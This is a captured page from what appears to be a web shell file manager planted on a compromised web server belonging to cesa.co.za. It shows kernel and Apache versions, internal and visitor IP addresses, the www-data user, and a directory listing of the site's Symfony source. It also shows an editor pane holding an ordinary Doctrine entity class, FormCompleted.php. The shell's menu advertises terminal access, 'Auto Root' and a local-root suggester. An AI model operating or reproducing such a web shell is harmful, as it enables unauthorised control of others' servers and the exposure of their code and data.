Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
src /
ContentBundle /
Entity /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
Files.php
6.69
KB
-rwxrwxr-x
2026-04-02 11:48
Form.php
10.37
KB
-rwxrwxr-x
2026-04-02 11:48
FormCompleted.php
5.6
KB
-rwxrwxr-x
2026-04-02 11:48
FormItem.php
17.12
KB
-rwxrwxr-x
2026-04-02 11:48
FormItemCompleted.php
3.81
KB
-rwxrwxr-x
2026-04-02 11:48
FormItemForm.php
1.57
KB
-rwxrwxr-x
2026-05-25 12:28
FormItemList.php
1.62
KB
-rwxrwxr-x
2026-05-25 12:28
FormItemType.php
1.54
KB
-rwxrwxr-x
2026-05-25 12:28
FormType.php
843
B
-rwxrwxr-x
2026-05-25 12:28
Save
Rename
<?php namespace App\ContentBundle\Entity; use App\SessionsBundle\Entity\Sessions; use Doctrine\Common\Collections\ArrayCollection; use Doctrine\Common\Collections\Collection; use Doctrine\ORM\Mapping as ORM; /** * FormCompleted * * @ORM\Table(name="content_form_completed") * @ORM\Entity(repositoryClass="App\ContentBundle\Repository\FormCompletedRepository") * @ORM\HasLifecycleCallbacks */ class FormCompleted { /** * @ORM\Id * @ORM\Column(type="string", unique=true) * @ORM\GeneratedValue(strategy="CUSTOM") * @ORM\CustomIdGenerator(class="Ramsey\Uuid\Doctrine\UuidGenerator") */ private $id; /** * @ORM\Column(type="integer") */ private $bce_module; /** * @ORM\Column(type="boolean", nullable=true, options={"default": false}) */ private $is_active; /** * @ORM\Column(type="boolean", nullable=true, options={"default": false}) */ private $is_deleted; /** * @ORM\Column(type="string", length=255, nullable=true) */ private $created_by; /** * @ORM\Column(type="datetime") */ private $created_at; /** * @ORM\Column(type="datetime") */ private $updated_at; /** * @ORM\OneToMany(targetEntity="FormItemCompleted", mappedBy="form_completed", cascade={"persist", "remove"}) */ private $form_item_completed; /** * @ORM\ManyToOne(targetEntity="Form", inversedBy="form_completed") * @ORM\JoinColumn(name="form_id", referencedColumnName="id") */ private $form; /** * @ORM\ManyToOne(targetEntity="App\SessionsBundle\Entity\Sessions") * @ORM\JoinColumn(name="session_id", referencedColumnName="id") */ private $session; public function __construct() { $this->form_item_completed = new ArrayCollection(); } public function getId(): ?string { return $this->id; } public function getBceModule(): ?int { return $this->bce_module; } public function setBceModule(?int $bce_module): static { $this->bce_module = $bce_module; return $this; } public function isIsActive(): ?bool { return $this->is_active; } public function setIsActive(?bool $is_active): static { $this->is_active = $is_active; return $this; } public function isIsDeleted(): ?bool { return $this->is_deleted; } public function setIsDeleted(?bool $is_deleted): static { $this->is_deleted = $is_deleted; return $this; } public function getCreatedBy(): ?string { return $this->created_by; } public function setCreatedBy(?string $created_by): static { $this->created_by = $created_by; return $this; } public function getCreatedAt(): ?\DateTimeInterface { return $this->created_at; } public function setCreatedAt(\DateTimeInterface $created_at): static { $this->created_at = $created_at; return $this; } public function getUpdatedAt(): ?\DateTimeInterface { return $this->updated_at; } public function setUpdatedAt(\DateTimeInterface $updated_at): static { $this->updated_at = $updated_at; return $this; } /** * @return Collection<int, FormItemCompleted> */ public function getFormItemCompleted(): Collection { return $this->form_item_completed; } public function addFormItemCompleted(FormItemCompleted $formItemCompleted): static { if (!$this->form_item_completed->contains($formItemCompleted)) { $this->form_item_completed->add($formItemCompleted); $formItemCompleted->setFormCompleted($this); } return $this; } public function removeFormItemCompleted(FormItemCompleted $formItemCompleted): static { if ($this->form_item_completed->removeElement($formItemCompleted)) { // set the owning side to null (unless already changed) if ($formItemCompleted->getFormCompleted() === $this) { $formItemCompleted->setFormCompleted(null); } } return $this; } public function getForm(): ?Form { return $this->form; } public function setForm(?Form $form): static { $this->form = $form; return $this; } public function getSession(): ?Sessions { return $this->session; } public function setSession(?Sessions $session): static { $this->session = $session; return $this; } /** * @ORM\PrePersist */ public function setCreatedAtValue() { if (is_null($this->getCreatedAt())) { $this->setCreatedAt(new \DateTime()); } if (is_null($this->getUpdatedAt())) { $this->setUpdatedAt(new \DateTime()); } } /** * @ORM\PreUpdate */ public function setUpdatedAtValue() { $this->setUpdatedAt(new \DateTime()); } public function __toString(): string { return "FormCompleted[id=" . $this->id . ", bce_module=" . $this->bce_module . ", is_active=" . $this->is_active . ", is_deleted=" . $this->is_deleted . ", created_by=" . $this->created_by . ", created_at=" . $this->created_at->format('Y-m-d H:i:s') . ", updated_at=" . $this->updated_at->format('Y-m-d H:i:s') . "]"; } public function isActive(): ?bool { return $this->is_active; } public function isDeleted(): ?bool { return $this->is_deleted; } }